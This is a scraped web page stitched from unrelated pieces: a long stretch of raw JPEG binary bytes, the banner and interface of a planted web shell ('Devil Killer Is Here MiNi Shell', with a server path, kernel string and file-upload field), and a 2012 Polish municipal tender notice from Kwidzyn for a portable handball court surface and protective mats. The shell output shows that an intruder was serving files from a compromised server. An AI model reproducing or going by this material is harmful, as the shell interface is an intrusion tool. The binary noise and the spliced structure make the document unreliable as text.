JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120307/70686-N-2012.html

<p class="kh_header"><b>Kwidzyn: Dostawa wielowarstwowej, syntetycznej nawierzchni sportowej do piłki ręcznej oraz maty ochronnej</b><br>
<b>Numer ogłoszenia: 70686 - 2012; data zamieszczenia: 07.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kwidzyn , ul. Warszawska 19, 82-500 Kwidzyn, woj. pomorskie, tel. 055 6464700, 6464777, faks 055 6464703.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kwidzyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wielowarstwowej, syntetycznej nawierzchni sportowej do piłki ręcznej oraz maty ochronnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje  dwa następujące zadania:
Zadanie nr 1-  Dostawa wielowarstwowej, syntetycznej nawierzchni sportowej do piłki ręcznej.
Zakres zamówienia obejmuje:
4.1.1.	Boisko przenośne
Mobilne boisko do gry w piłkę ręczną winno być wykonane z nawierzchni PCV, heterogenicznej o minimalnej grubości 7 mm.
Boisko wykonane z rolowanej nawierzchni szerokości max. 1.5 m łączonej na stykach taśmą klejącą, z możliwością jej usunięcia. Nawierzchnia winna być dostarczona o wymiarach 44,00 x 24,00 i oficjalnych kolorach akceptowanych przez EHF oraz ZPRP.
Wykładzina instalowana ręcznie lub przy użyciu specjalistycznych wózków do transportu, rozwijania i nawijania pojedynczych rolek wykładziny, podklejanie połączeń pasów wykładziny winno odbywać się przy pomocy urządzenia mocującego taśmę klejącą, wyznaczenie linii wyznaczających pola gry boisk należy wykonać za pomocą taśm klejących gładkich.
Warstwa użytkowa musi być wykonana z czystego winylu, środek wzmocniony siatką z włókna szklanego, a warstwa spodnia -sprężysta- z pianki PCV. Powierzchnia wykładziny zabezpieczona jest specjalnym środkiem, który stworzy usieciowaną strukturę zabezpieczającą przed zabrudzeniami, zmniejszy koszty konserwacji oraz łagodzi skutki niszczenia. 
Wymagania szczególne
Wykładzina fabrycznie nowa, gatunek 1, rolowana, wykonana z PCV, heterogeniczna.
Całkowita grubość wykładziny min. 7 mm, szerokość rolki min. 1.5 m, 
Minimalna grubość warstwy ścieralnej 2.1 mm, wzmacnianej siatką z włókna szklanego.
Wierzchnia warstwa użytkowa musi być zabezpieczona fabrycznie przez producenta na całej powierzchni środkiem zapewniającym ochronę przeciwpleśniową i bakteriostatyczną (np. Sanosol)
Reakcja na ogień - min. Cfl s1 (wg. EN 13 501-1)
Odporność na poślizg - min. 105 (wg. EN 13 036-4)
Absorbcja wstrząsów - min. 32 (wg. EN 14 808)
Odporność na ścieranie - min. 299 (wg. EN ISO 5470-1)
Wykładzina musi spełniać normy i posiadać certyfikaty według wymagań poniżej.
Deklaracja Zgodności CE zgodności z normą PN-EN 14 904,
Aprobata techniczna ITB 
Atest higieniczny PZH 
Raport klasyfikacji reakcji na ogień 
Certyfikat EHF (Europejski Związek Piłki Ręcznej)

4.1.2.	Wyposażenie dodatkowe do montażu boiska do p. ręcznej:
kompletne urządzenie do mocowania taśmy (np. typu D200) pod wykładziną- szt.1
kompletne urządzenia do znakowania z głowicą cięcia - szt. 1 
taśmy (np. typu D200) (ilość do 10 - krotnego kompletnego rozłożenia boiska do piłki ręcznej),
taśma na linie (np. typu 3M) o szer. 5 cm ( ilość do 5 - krotnego kompletnego wyklejenia boiska do piłki ręcznej)
W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego należy na etapie dostawy przedstawić:
kartę techniczną,
wzór karty gwarancyjnej z warunkami gwarancji,
certyfikat lub atest bezpieczeństwa wydany przez jednostkę certyfikującą
Dla zapewnienia prawidłowej jakości montażu oraz zachowania gwarancji producenta nawierzchni - Oferent musi posiadać imienną autoryzację producenta. Autoryzacja powinna być załączona do oferty.
W ramach zamówienia Wykonawca wykona w terminie wskazanym przez Zamawiającego pierwsze rozłożenie maty i wyklejenie linii do boiska piłki ręcznej.

Zadanie nr 2 -Wykładzina ochronna (w brytach)
Wykładzina ma za zadanie utrzymanie i zabezpieczenie parkietu przed intensywnym użytkowaniem w obuwiu niesportowym, przez ewentualnymi uszkodzeniami powodowanymi przez rozstawiane stelaże i konstrukcje.
Wykładzina ochronna składać się winna z następujących warstw:
Wierzchnia warstwa to gęsta wykładzina dywanowa (igłowa) dająca poczucie miękkości i sprężystości, o odpowiednich własnościach akustycznych - tłumienie hałasu. Winna umożliwiać łatwe czyszczenie na sucho 1 mokro. 
Druga warstwa z włókien poliestrowych, która ma za zadanie chronić podłogę przed obciążeniami punktowymi
Trzecia warstwa z włókna szklanego zapewniające wysoką odporność na rozciąganie 
Spodnia warstwa w postaci maty o dużej gęstości PVC zapewniająca odpowiednie przyleganie do sportowej podłogi

Dane techniczne:
Wymiary - 2 x 1 m
Ognioodporność - EN 13501-1
Antypoślizgowość - EN 13893
Stosowanie z ogrzewaniem podłogowym - EN 12524.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.91.21.00-4, 19.52.10.00-4, 45.43.21.11-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium w niniejszym postępowaniu wynosi:
Dla zadania nr 1-  4.500,00 zł
Dla zadania nr 2-  2.000,00 zł
Zamawiający żąda wniesienia wadium w pełnych wysokościach przed terminem do składania ofert.
Wadium przetargowe należy wnieść do Zamawiającego w jednej lub kilku następujących formach: 
pieniądzu (przelewem na rachunek bankowy Zamawiającego w Powiślańskim Banku Spółdzielczym w Kwidzynie nr 11 8300 0009 0008 2107 2000 0040),
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
W przypadku wadium wnoszonego w pieniądzu za termin wniesienia uznaje się chwilę uznania kwoty na rachunku Zamawiającego.
Wadium wnoszone w formie: poręczeń, gwarancji bankowych lub ubezpieczeniowych należy złożyć w formie oryginału. Zaleca się dołączenie kopii dokumentu wadialnego i  trwałe złączenie z ofertą.
Gwarancja bankowa lub ubezpieczeniowa składana jako wadium powinna zawierać:
a)	zobowiązanie gwaranta do zapłaty kwoty wadium w przypadku, gdy Wykonawca wygrywając przetarg odmówi podpisania umowy na warunkach określonych w ofercie lub zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy,
b)	określenie wysokości zobowiązania gwaranta, którego wysokość musi być równa kwocie wadium,
c)	termin obowiązywania gwarancji powinien obejmować okres:
począwszy od upływu terminu składania ofert, który został określony w pkt. 13 SIWZ, a w przypadku jego zmiany, począwszy od upływu aktualnie obowiązującego terminu składania ofert,
aż do upływu ostatniego dnia terminu związania z ofertą, który został określony w pkt. 11 SIWZ,
d)	wskazanie, iż beneficjentem gwarancji jest Zamawiający,
e)	oznaczenie, iż zleceniodawcą gwarancji jest Wykonawca,
f)	klauzule, że gwarant zapłaci kwotę wynikającą z gwarancji na pierwsze żądanie Zamawiającego oraz że gwarancja jest nie odwoływalna.
Poręczenie bankowe lub udzielone przez podmiot określony w art. 6b ust.5 pkt. 2 ustawy z 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824) składane jako wadium powinno zawierać: 
a)	zobowiązanie poręczyciela do zapłaty kwoty wadium w przypadku, gdy Wykonawca wygrywając przetarg odmówi podpisania umowy na warunkach określonych w ofercie lub zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy,
b)	określenie kwoty, do jakiej następuje poręczenie - wysokość musi być równa kwocie wadium, 
c)	termin obowiązywania poręczenia powinien obejmować okres:
począwszy od upływu terminu składania ofert, który został określony w pkt. 13 SIWZ, a w przypadku jego zmiany, począwszy od upływu aktualnie obowiązującego terminu składania ofert,
aż do upływu ostatniego dnia terminu związania z ofertą, który został określony w pkt. 11 SIWZ,
d)	wskazanie, iż poręczenie dotyczy wniesienia przez dostawcę wadium w postępowaniu o udzielenie zamówienia publicznego ogłoszonego przez Zamawiającego.
Wykonawca, który nie wniesie wadium w terminie do składania ofert zostanie wykluczony z postępowania.
Wadium wpłacone w pieniądzu Zamawiający przechowuje na rachunku bankowym. Wadium wniesione w pieniądzu Zamawiający zwraca wraz z odsetkami wynikającymi z umowy rachunku bankowego, pomniejszonymi o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek wskazany przez Wykonawcę.
Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem, iż Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 Pzp, nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1 Pzp lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn niezależnych po jego stronie.
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
Wniosek o zwrot wadium musi być podpisany przez osoby upoważnione do składania oświadczenia woli w imieniu Wykonawcy.
Zamawiający będzie żądał ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
Wadium przetargowe wraz z odsetkami zatrzymuje Zamawiający wówczas, jeżeli Wykonawca którego oferta została wybrana: 
odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunku udziału w postępowaniu zgodnie z art. 44 ustawy Pzp (złożonego przez Wykonawcę na Formularzu Ofertowym);</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunek, jeżeli wykaże, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał a w przypadku świadczeń okresowych lub ciągłych również wykonywał min.: 1 zamówienie polegające na dostawie wielowarstwowej, syntetycznej nawierzchni sportowej o wartości min. 150.000,00 zł (dla zadania nr 1) ; min. 1 dostawę maty ochronnej o wartości 50.000,00 zł (dla zadania nr 2);</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunku udziału w postępowaniu zgodnie z art. 44 ustawy Pzp (złożonego przez Wykonawcę na Formularzu Ofertowym);</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunku udziału w postępowaniu zgodnie z art. 44 ustawy Pzp (złożonego przez Wykonawcę na Formularzu Ofertowym);</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie oświadczenia o spełnieniu warunku udziału w postępowaniu zgodnie z art. 44 ustawy Pzp (złożonego przez Wykonawcę na Formularzu Ofertowym);</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kwidzyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kwidzynie
ul. Warszawska 19
82-500 Kwidzyn
pokój. 312.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2012 godzina 10:00, miejsce: Urząd Miejski w Kwidzynie
ul. Warszawska 19
82-500 Kwidzyn
pokój. 312.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1-  Dostawa wielowarstwowej, syntetycznej nawierzchni sportowej do piłki ręcznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1-  Dostawa wielowarstwowej, syntetycznej nawierzchni sportowej do piłki ręcznej.
Zakres zamówienia obejmuje:
4.1.1.	Boisko przenośne
Mobilne boisko do gry w piłkę ręczną winno być wykonane z nawierzchni PCV, heterogenicznej o minimalnej grubości 7 mm.
Boisko wykonane z rolowanej nawierzchni szerokości max. 1.5 m łączonej na stykach taśmą klejącą, z możliwością jej usunięcia. Nawierzchnia winna być dostarczona o wymiarach 44,00 x 24,00 i oficjalnych kolorach akceptowanych przez EHF oraz ZPRP.
Wykładzina instalowana ręcznie lub przy użyciu specjalistycznych wózków do transportu, rozwijania i nawijania pojedynczych rolek wykładziny, podklejanie połączeń pasów wykładziny winno odbywać się przy pomocy urządzenia mocującego taśmę klejącą, wyznaczenie linii wyznaczających pola gry boisk należy wykonać za pomocą taśm klejących gładkich.
Warstwa użytkowa musi być wykonana z czystego winylu, środek wzmocniony siatką z włókna szklanego, a warstwa spodnia /sprężysta/ z pianki PCV. Powierzchnia wykładziny zabezpieczona jest specjalnym środkiem, który stworzy usieciowaną strukturę zabezpieczającą przed zabrudzeniami, zmniejszy koszty konserwacji oraz łagodzi skutki niszczenia. 
Wymagania szczególne
Wykładzina fabrycznie nowa, gatunek 1, rolowana, wykonana z PCV, heterogeniczna.
Całkowita grubość wykładziny min. 7 mm, szerokość rolki min. 1.5 m, 
Minimalna grubość warstwy ścieralnej 2.1 mm, wzmacnianej siatką z włókna szklanego.
Wierzchnia warstwa użytkowa musi być zabezpieczona fabrycznie przez producenta na całej powierzchni środkiem zapewniającym ochronę przeciwpleśniową i bakteriostatyczną (np. Sanosol)
Reakcja na ogień - min. Cfl s1 (wg. EN 13 501-1)
Odporność na poślizg - min. 105 (wg. EN 13 036-4)
Absorbcja wstrząsów - min. 32 (wg. EN 14 808)
Odporność na ścieranie - min. 299 (wg. EN ISO 5470-1)
Wykładzina musi spełniać normy i posiadać certyfikaty według wymagań poniżej.
Deklaracja Zgodności CE zgodności z normą PN-EN 14 904,
Aprobata techniczna ITB 
Atest higieniczny PZH 
Raport klasyfikacji reakcji na ogień 
Certyfikat EHF (Europejski Związek Piłki Ręcznej)

4.1.2.	Wyposażenie dodatkowe do montażu boiska do p. ręcznej:
kompletne urządzenie do mocowania taśmy (np. typu D200) pod wykładziną- szt.1
kompletne urządzenia do znakowania z głowicą cięcia - szt. 1 
taśmy (np. typu D200) (ilość do 10 - krotnego kompletnego rozłożenia boiska do piłki ręcznej),
taśma na linie (np. typu 3M) o szer. 5 cm ( ilość do 5 - krotnego kompletnego wyklejenia boiska do piłki ręcznej)
W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego należy na etapie dostawy przedstawić:
kartę techniczną,
wzór karty gwarancyjnej z warunkami gwarancji,
certyfikat lub atest bezpieczeństwa wydany przez jednostkę certyfikującą
Dla zapewnienia prawidłowej jakości montażu oraz zachowania gwarancji producenta nawierzchni - Oferent musi posiadać imienną autoryzację producenta. Autoryzacja powinna być załączona do oferty.
W ramach zamówienia Wykonawca wykona w terminie wskazanym przez Zamawiającego pierwsze rozłożenie maty i wyklejenie linii do boiska piłki ręcznej..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 34.91.21.00-4, 19.52.10.00-4, 45.43.21.11-5.</p></li>
